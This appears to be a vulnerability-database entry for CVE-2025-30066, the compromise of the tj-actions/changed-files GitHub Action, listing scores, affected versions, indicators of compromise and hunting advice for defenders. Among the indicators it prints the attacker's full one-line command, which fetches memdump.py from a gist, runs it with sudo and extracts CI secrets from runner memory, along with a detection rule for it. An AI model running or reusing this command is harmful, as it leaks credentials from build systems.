cbcvebase.
CVE-2025-30066
published 2025-03-15

CVE-2025-30066: tj-actions changed-files before 46 allows remote attackers to discover secrets by reading actions logs. (The tags v1 through v45.0.7 were affected on…

PriorityP186high8.6CVSS 3.1
AVNACLPRNUINSCCHINAN
KEVITW
CISA Known Exploited Vulnerabilitydue 2025-04-08
Exploited in the wild
EPSS
41.01%
98.5th percentile
tj-actions changed-files before 46 allows remote attackers to discover secrets by reading actions logs. (The tags v1 through v45.0.7 were affected on 2025-03-14 and 2025-03-15 because they were modified by a threat actor to point at commit 0e58ed8, which contained malicious updateFeatures code.)

Affected

3 ranges
VendorProductVersion rangeFixed in
tj-actionschanged-files<= 45.0.7
tj-actionschanged-files>= 0 < 46.0.146.0.1
tj-actionschanged-files>= 1 < 4646

Detection & IOCsextracted from sources · hover to see the quote

hash0e58ed8671d6b60d0890c21b07f8835ace038e67
urlhttps://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py
filenamememdump.py
commandcurl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0
processRunner.Worker
sigma
dataSource.name = 'SentinelOne' and endpoint.os = 'linux' and event.type = 'Process Creation' and (tgt.process.name in:anycase ('curl') or tgt.process.displayName = 'curl') and tgt.process.cmdline contains '-sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3'
  • Search workflow logs for double-encoded base64 strings within the 'changed-files' step output — presence indicates successful malicious payload execution
  • Hunt for workflow runs referencing the malicious commit hash 0e58ed8 or the full SHA 0e58ed8671d6b60d0890c21b07f8835ace038e67 in GitHub Actions workflow files
  • Audit CI/CD workflow logs from March 14–15, 2025 for outbound curl requests to gist.githubusercontent.com fetching memdump.py, indicating active exploitation
  • Use GitHub code search to identify repositories in your org referencing tj-actions/changed-files: https://github.com/search?q=org:+tj-actions/changed-files&type=code
  • Leaked secrets to look for in exposed workflow logs include AWS access keys, GitHub PATs (ghs_ prefix), npm tokens, and private RSA keys
  • ghs_-prefixed GitHub tokens exposed in logs carry limited long-term risk as they expire within 24 hours or on workflow job completion; prioritize rotating other secret types
  • Investigate the reviewdog/action-setup GitHub Action as a potential initial access vector that may have contributed to the compromise of tj-actions/changed-files
  • ·Only repositories using hash-pinned versions of tj-actions/changed-files were unaffected; all tag-based references (v1 through v45.0.7) were retroactively poisoned to point at the malicious commit
  • ·No external C2 exfiltration was observed; secrets were only dumped into workflow logs (double-encoded base64), meaning private repositories with non-public logs had limited exposure
  • ·Workflows that do not explicitly reference custom secrets (e.g., secrets.MYSECRET) are unlikely to have had sensitive secrets compromised
  • ·The GitHub Gist hosting memdump.py was taken down on March 15, 2025, and the compromised repository was restored; cached actions may still pose a residual risk

CVSS provenance

nvdv3.18.6HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
vulncheck8.6HIGH
cisa8.6HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.